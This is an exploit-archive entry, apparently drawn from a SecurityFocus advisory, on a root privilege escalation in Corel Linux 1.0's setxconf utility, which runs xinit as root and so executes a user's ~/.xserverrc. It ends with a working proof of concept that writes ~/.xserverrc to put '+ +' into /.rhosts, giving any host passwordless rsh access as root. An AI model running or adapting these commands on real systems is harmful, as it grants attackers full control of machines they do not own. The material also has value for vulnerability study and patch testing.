6 lines
No EOL
361 B
Text
Executable file
6 lines
No EOL
361 B
Text
Executable file
source: http://www.securityfocus.com/bid/1008/info
|
|
|
|
A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.
|
|
|
|
cat > ~/.xserverrc
|
|
echo "+ +" > /.rhosts |